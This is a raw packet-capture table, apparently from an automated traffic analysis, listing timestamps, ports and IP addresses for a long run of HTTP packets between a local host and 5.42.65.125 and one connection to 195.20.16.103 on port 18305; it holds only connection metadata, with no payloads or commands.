Dec 27, 2023 17:57:25.369606018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.369622946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.369659901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.370424986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.370440960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.370471001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.371258020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.371277094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.371331930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.372172117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.372190952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.372237921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.372997999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.373032093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.373039961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.373855114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.373887062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.373938084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.374722004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.374739885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.374767065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.375588894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.375627041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.375680923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.376354933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.376369953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.376395941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.377162933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.377192974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.377207041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.378143072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.378158092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.378196955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.378925085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.378938913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.378972054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.379818916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.379836082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.379865885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.380613089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.380630016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.380664110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.381418943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.381438017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.381505966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.382339954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.382356882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.382385015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.383225918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.383244991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.383291006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.384042025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.384072065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.384150982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.384828091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.384862900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.384888887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.385668039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.385708094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.385716915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.386539936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.386554956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.386612892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.387394905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.387412071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.387470961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.388236046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.388252974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.388288021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.389055014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.389074087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.389112949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.389905930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.389928102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.389964104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.390712023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.390727043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.390764952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.391582012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.391602039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.391655922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.392452955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.392498970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.392507076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.393335104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.393368959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.393421888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.394212961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.394233942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.394268990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.394951105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.394969940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.395020962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.395997047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.396015882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.396061897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.396667004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.396684885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.396735907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.397609949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.397629023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.397661924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.398403883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.398430109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.398457050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.399336100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.399358988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.399401903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.400065899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.400110960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.400141001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.400983095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.400996923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.401030064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.401760101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.401777029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.401809931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.402657986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.402677059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.402723074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.403500080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.403516054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.403620005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.404252052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.404267073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.404299974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.405196905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.405215979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.405256987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.406009912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.406050920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.406100035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.406903028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.406919956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.406958103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.407736063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.407783031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.407825947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.408567905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.408585072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.408633947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.409406900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.409437895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.409454107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.410243988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.410259962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.410309076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.411082983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.411098003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.411147118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.411906004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.411921978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.411950111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.412756920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.412771940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.412801027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.413585901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.413602114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.413634062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.414520025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.414541960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.414568901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.415330887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.415355921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.415400982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.416161060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.416208029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.416232109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.417037010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.417087078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.417090893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.417506933 CET	49739	18305	192.168.2.4	195.20.16.103
Dec 27, 2023 17:57:25.417843103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.417860985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.417900085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.418742895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.418761969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.418787003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.419531107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.419554949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.419600964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.420490980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.420527935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.420669079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.421375990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.421397924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.421422005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.422123909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.422148943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.422194004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.422925949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.422955990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.422980070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.423755884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.423798084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.423851967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.424633026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.424655914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.424690008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.425458908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.425477982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.425546885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.426331043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.426372051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.426417112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.427150011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.427167892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.427221060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.427962065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.427983999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.428024054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.428847075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.428864956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.428899050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.429721117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.429739952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.429778099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.430488110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.430514097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.430550098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.431432962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.431453943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.431505919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.432212114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.432244062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.432269096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.433048010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.433065891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.433154106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.433903933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.433919907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.433959961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.434732914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.434748888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.434784889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.435539007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.435559034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.435614109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.436450958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.436496019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.436532974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.437350988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.437366009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.437403917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.438113928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.438133001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.438169956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.439014912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.439033031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.439085007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.439802885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.439819098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.439857006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.440632105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.440649033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.440684080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.441431999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.441447020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.441484928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.442292929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.442308903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.442364931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.443141937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.443159103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.443214893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.443944931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.443960905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.443995953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.444715977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.444742918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.444768906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.445497990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.445513964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.445569038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.446369886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.446419001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.446436882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.447068930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.447108984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.447160959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.447937012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.447952032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.447987080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.448728085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.448745966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.448782921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.449440956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.449455976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.449510098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.449646950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.450143099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.450186968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.450203896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.450896025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.450911999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.450958014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.452059984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.452075958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.452111006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.452461004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.452478886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.452507973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.453144073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.453160048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.453190088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.453944921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.453969955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.453993082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.454539061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.454716921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.454734087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.454763889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.455372095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.455385923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.455435991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.455952883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.456135988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.456151962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.456202030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.456964970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.457011938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.457014084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.457572937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.457619905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.457673073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.458314896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.458328962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.458362103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.459019899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.459033966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.459079027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.459877014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.459892035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.459925890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.460443020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.460458994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.460488081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.461163998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.461178064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.461215019 CET	49738	80	192.168.2.4	5.42.65.125
